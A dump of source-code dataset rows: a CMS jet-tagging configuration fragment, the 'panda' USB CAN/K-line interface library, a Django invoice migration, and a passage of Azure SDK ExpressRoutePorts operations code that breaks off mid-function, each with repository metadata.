ak1PFCombinedSecondaryVertexV2BJetTags
)
ak1PFJetBtaggingNegSV = cms.Sequence(
ak1PFImpactParameterTagInfos *
ak1PFSecondaryVertexNegativeTagInfos *
ak1PFNegativeSimpleSecondaryVertexHighEffBJetTags +
ak1PFNegativeSimpleSecondaryVertexHighPurBJetTags +
ak1PFNegativeCombinedSecondaryVertexBJetTags +
ak1PFPositiveCombinedSecondaryVertexBJetTags +
ak1PFNegativeCombinedSecondaryVertexV2BJetTags +
ak1PFPositiveCombinedSecondaryVertexV2BJetTags
)
ak1PFJetBtaggingMu = cms.Sequence(
ak1PFSoftPFMuonsTagInfos *
ak1PFSoftPFMuonBJetTags +
ak1PFSoftPFMuonByIP3dBJetTags +
ak1PFSoftPFMuonByPtBJetTags +
ak1PFNegativeSoftPFMuonByPtBJetTags +
ak1PFPositiveSoftPFMuonByPtBJetTags
)
ak1PFJetBtagging = cms.Sequence(
ak1PFJetBtaggingIP
* ak1PFJetBtaggingSV
# * ak1PFJetBtaggingNegSV
# * ak1PFJetBtaggingMu
)
ak1PFpatJetsWithBtagging = patJets.clone(
jetSource = cms.InputTag("ak1PFJets"),
genJetMatch = cms.InputTag("ak1PFmatch"),
genPartonMatch = cms.InputTag("ak1PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak1PFcorr")),
JetPartonMapSource = cms.InputTag("ak1PFPatJetFlavourAssociation"),
JetFlavourInfoSource = cms.InputTag("ak1PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("ak1PFJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = False,
discriminatorSources = cms.VInputTag(
cms.InputTag("ak1PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("ak1PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("ak1PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("ak1PFCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("ak1PFJetBProbabilityBJetTags"),
cms.InputTag("ak1PFJetProbabilityBJetTags"),
# cms.InputTag("ak1PFSoftPFMuonByPtBJetTags"),
# cms.InputTag("ak1PFSoftPFMuonByIP3dBJetTags"),
cms.InputTag("ak1PFTrackCountingHighEffBJetTags"),
cms.InputTag("ak1PFTrackCountingHighPurBJetTags"),
),
tagInfoSources = cms.VInputTag(cms.InputTag("ak1PFImpactParameterTagInfos"),cms.InputTag("ak1PFSecondaryVertexTagInfos")),
jetIDMap = cms.InputTag("ak1PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = True,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
# embedCaloTowers = False,
# embedPFCandidates = True
)
ak1PFNjettiness = Njettiness.clone(
src = cms.InputTag("ak1PFJets"),
R0 = cms.double(0.1)
)
ak1PFpatJetsWithBtagging.userData.userFloats.src += [
'ak1PFNjettiness:tau1',
'ak1PFNjettiness:tau2',
'ak1PFNjettiness:tau3']
ak1PFJetAnalyzer = inclusiveJetAnalyzer.clone(
jetTag = cms.InputTag("ak1PFpatJetsWithBtagging"),
genjetTag = 'ak1HiSignalGenJets',
rParam = 0.1,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
doSubEvent = True,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("ak1PF"),
jetName = cms.untracked.string("ak1PF"),
genPtMin = cms.untracked.double(5),
doTower = cms.untracked.bool(False),
doSubJets = cms.untracked.bool(False),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("ak1GenJets"),
doGenTaus = cms.untracked.bool(False),
genTau1 = cms.InputTag("ak1HiGenNjettiness","tau1"),
genTau2 = cms.InputTag("ak1HiGenNjettiness","tau2"),
genTau3 = cms.InputTag("ak1HiGenNjettiness","tau3"),
doGenSym = cms.untracked.bool(False),
genSym = cms.InputTag("ak1GenJets","sym"),
genDroppedBranches = cms.InputTag("ak1GenJets","droppedBranches")
)
ak1PFJetSequence_mc = cms.Sequence(
# ak1PFclean
# *
ak1PFmatch
# *
# ak1PFmatchGroomed
*
ak1PFparton
*
ak1PFcorr
# *
# ak1PFJetID
*
ak1PFPatJetFlavourId
*
ak1PFJetTracksAssociatorAtVertex
*
ak1PFJetBtagging
*
# No constituents for calo jets in pp. Must be removed for pp calo jets but
# I'm not sure how to do this transparently (Marta)
ak1PFNjettiness
*
ak1PFpatJetsWithBtagging
*
ak1PFJetAnalyzer
)
ak1PFJetSequence_data = cms.Sequence(
ak1PFcorr
*
# ak1PFJetID
# *
ak1PFJetTracksAssociatorAtVertex
*
ak1PFJetBtagging
*
ak1PFNjettiness
*
ak1PFpatJetsWithBtagging
*
ak1PFJetAnalyzer
)
ak1PFJetSequence_mb = cms.Sequence(
ak1PFJetSequence_mc)
ak1PFJetSequence_jec = cms.Sequence(
ak1PFJetSequence_mc)
ak1PFJetSequence = cms.Sequence(
ak1PFJetSequence_jec)
ak1PFJetAnalyzer.genPtMin = cms.untracked.double(1)
ak1PFJetAnalyzer.jetPtMin = cms.double(1)
| [
"[email protected]"
] | |
5a9d027ff8cc18ecab56ba138f3d711c9d7f3eff | 64a673e2e84c962ae4ab312b7f011e13f7d2df55 | /lib/panda.py | 516fb243713e658ac807e6c24b5e57f96070de17 | [
"MIT"
] | permissive | ScienceXChina/panda | c00960901246627d643cdf33ee81066988a15fdb | efca3f70939d4c2d3c8c0901536e9d89a5bbcbd6 | refs/heads/master | 2021-01-19T20:50:57.597486 | 2017-04-18T01:17:34 | 2017-04-18T01:17:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,274 | py | # python library to interface with panda
import struct
import usb1
from usb1 import USBErrorIO, USBErrorOverflow
class Panda(object):
def __init__(self, serial=None, claim=True):
context = usb1.USBContext()
self.handle = None
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
if serial is None or device.getSerialNumber() == serial:
print "opening device", device.getSerialNumber()
self.handle = device.open()
if claim:
self.handle.claimInterface(0)
break
assert self.handle != None
@staticmethod
def list():
context = usb1.USBContext()
ret = []
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
ret.append(device.getSerialNumber())
return ret
# ******************* health *******************
def health(self):
dat = self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xd2, 0, 0, 0x20)
a = struct.unpack("IIBBBBB", dat)
return {"voltage": a[0], "current": a[1],
"started": a[2], "controls_allowed": a[3],
"gas_interceptor_detected": a[4],
"started_signal_detected": a[5],
"started_alt": a[6]}
# ******************* can *******************
def set_gmlan(self, on):
if on:
self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xdb, 1, 0, '')
else:
self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xdb, 0, 0, '')
def can_send_many(self, arr):
snds = []
for addr, _, dat, bus in arr:
snd = struct.pack("II", ((addr << 21) | 1), len(dat) | (bus << 4)) + dat
snd = snd.ljust(0x10, '\x00')
snds.append(snd)
while 1:
try:
self.handle.bulkWrite(3, ''.join(snds))
break
except (USBErrorIO, USBErrorOverflow):
print "CAN: BAD SEND MANY, RETRYING"
def can_send(self, addr, dat, bus):
self.can_send_many([[addr, None, dat, bus]])
def can_recv(self):
def __parse_can_buffer(dat):
ret = []
for j in range(0, len(dat), 0x10):
ddat = dat[j:j+0x10]
f1, f2 = struct.unpack("II", ddat[0:8])
ret.append((f1 >> 21, f2>>16, ddat[8:8+(f2&0xF)], (f2>>4)&0xf))
return ret
dat = ""
while 1:
try:
dat = self.handle.bulkRead(1, 0x10*256)
break
except (USBErrorIO, USBErrorOverflow):
print "CAN: BAD RECV, RETRYING"
return __parse_can_buffer(dat)
# ******************* serial *******************
def serial_read(self, port_number):
return self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, port_number, 0, 0x100)
def serial_write(self, port_number):
return self.handle.bulkWrite(2, chr(port_number) + ln)
# ******************* kline *******************
# pulse low for wakeup
def kline_wakeup(self):
ret = self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xf0, 0, 0, "")
def kline_drain(self, bus=2):
# drain buffer
bret = ""
while 1:
ret = self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, bus, 0, 0x100)
if len(ret) == 0:
break
bret += str(ret)
return bret
def kline_ll_recv(self, cnt, bus=2):
echo = ""
while len(echo) != cnt:
echo += str(self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, bus, 0, cnt-len(echo)))
return echo
def kline_send(self, x, bus=2, checksum=True):
def get_checksum(dat):
result = 0
result += sum(map(ord, dat))
result = -result
return chr(result&0xFF)
self.kline_drain(bus=bus)
if checksum:
x += get_checksum(x)
for i in range(0, len(x), 0x10):
ts = x[i:i+0x10]
self.handle.bulkWrite(2, chr(bus)+ts)
echo = self.kline_ll_recv(len(ts), bus=bus)
if echo != ts:
print "**** ECHO ERROR %d ****" % i
print echo.encode("hex")
print ts.encode("hex")
assert echo == ts
def kline_recv(self, bus=2):
msg = self.kline_ll_recv(2, bus=bus)
msg += self.kline_ll_recv(ord(msg[1])-2, bus=bus)
return msg
| [
"[email protected]"
] | |
2224a59c364b7d23fe7e1fda9e1c4882185ad1a2 | 7c8bff784568691c516833ac81afc967857d24e2 | /jacc/migrations/0013_auto_20180329_1052.py | 416bb15ffddf4f84db0de59def8ab08f641d0a94 | [
"MIT"
] | permissive | kajala/django-jacc | b71f2c3df1321b9bb31e1e648895931b735949a6 | 4acb8ca2d32b11fd5afa3b5316b13be223b20ec6 | refs/heads/develop | 2023-08-18T14:12:38.196880 | 2023-08-11T15:18:57 | 2023-08-11T15:18:57 | 121,229,896 | 11 | 5 | MIT | 2021-07-12T15:02:36 | 2018-02-12T10:02:20 | Python | UTF-8 | Python | false | false | 458 | py | # Generated by Django 2.0.2 on 2018-03-29 10:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("jacc", "0012_auto_20180218_0638"),
]
operations = [
migrations.AlterField(
model_name="invoice",
name="number",
field=models.BigIntegerField(blank=True, db_index=True, default=None, null=True, verbose_name="invoice number"),
),
]
| [
"[email protected]"
] | |
6ba866c5effbeeecf9d64d9022e00310d5b49761 | 564d6a4d305a8ac6a7e01c761831fb2081c02d0f | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_08_01/operations/_express_route_ports_operations.py | c4af97d395be72cb5207f65765cddeee106487ae | [
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] | permissive | paultaiton/azure-sdk-for-python | 69af4d889bac8012b38f5b7e8108707be679b472 | d435a1a25fd6097454b7fdfbbdefd53e05029160 | refs/heads/master | 2023-01-30T16:15:10.647335 | 2020-11-14T01:09:50 | 2020-11-14T01:09:50 | 283,343,691 | 0 | 0 | MIT | 2020-07-28T22:43:43 | 2020-07-28T22:43:43 | null | UTF-8 | Python | false | false | 28,861 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ExpressRoutePortsOperations(object):
"""ExpressRoutePortsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'expressRoutePortName': self._serialize.url("express_route_port_name", express_route_port_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified ExpressRoutePort resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param express_route_port_name: The name of the ExpressRoutePort resource.
:type express_route_port_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
express_route_port_name=express_route_port_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.ExpressRoutePort"
"""Retrieves the requested ExpressRoutePort resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param express_route_port_name: The name of ExpressRoutePort.
:type express_route_port_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ExpressRoutePort, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_08_01.models.ExpressRoutePort
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'expressRoutePortName': self._serialize.url("express_route_port_name", express_route_port_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
parameters, # type: "models.ExpressRoutePort"
**kwargs # type: Any
):
# type: (...) -> "models.ExpressRoutePort"
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'expressRoutePortName': self._serialize.url("express_route_port_name", express_route_port_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ExpressRoutePort')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
parameters, # type: "models.ExpressRoutePort"
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.ExpressRoutePort"]
"""Creates or updates the specified ExpressRoutePort resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param express_route_port_name: The name of the ExpressRoutePort resource.
:type express_route_port_name: str
:param parameters: Parameters supplied to the create ExpressRoutePort operation.
:type parameters: ~azure.mgmt.network.v2019_08_01.models.ExpressRoutePort
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ExpressRoutePort or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_08_01.models.ExpressRoutePort]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
express_route_port_name=express_route_port_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def _update_tags_initial(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "models.ExpressRoutePort"
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'expressRoutePortName': self._serialize.url("express_route_port_name", express_route_port_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def begin_update_tags(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.ExpressRoutePort"]
"""Update ExpressRoutePort tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param express_route_port_name: The name of the ExpressRoutePort resource.
:type express_route_port_name: str
:param parameters: Parameters supplied to update ExpressRoutePort resource tags.
:type parameters: ~azure.mgmt.network.v2019_08_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ExpressRoutePort or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_08_01.models.ExpressRoutePort]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
express_route_port_name=express_route_port_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ExpressRoutePortListResult"]
"""List all the ExpressRoutePort resources in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ExpressRoutePortListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.ExpressRoutePortListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePortListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ExpressRoutePortListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts'} # type: ignore
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ExpressRoutePortListResult"]
"""List all the ExpressRoutePort resources in the specified subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ExpressRoutePortListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.ExpressRoutePortListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePortListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
